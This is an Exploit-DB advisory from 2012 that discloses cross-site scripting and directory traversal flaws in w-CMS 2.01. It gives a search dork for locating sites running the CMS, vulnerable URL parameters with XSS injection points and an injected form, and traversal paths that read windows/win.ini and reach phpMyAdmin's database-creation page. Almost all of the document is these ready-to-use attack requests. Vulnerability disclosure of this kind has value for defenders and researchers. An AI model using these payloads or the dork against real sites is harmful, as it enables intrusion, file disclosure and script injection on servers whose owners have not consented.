w-CMS 2.01 - Multiple Vulnerabilities

EDB-ID:

18348




Platform:

PHP

Date:

2012-01-10


# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

W-CMS cross site scripting
_______________

Vulnerable Link __________\/_____________________
_______________

http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"


http://localhost/?p=3<FORM action="Default.asp?PageId=-1" 
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value="" 
name="txtSEARCH"></FORM>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks

This script is possibly vulnerable to directory traversal attacks

http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net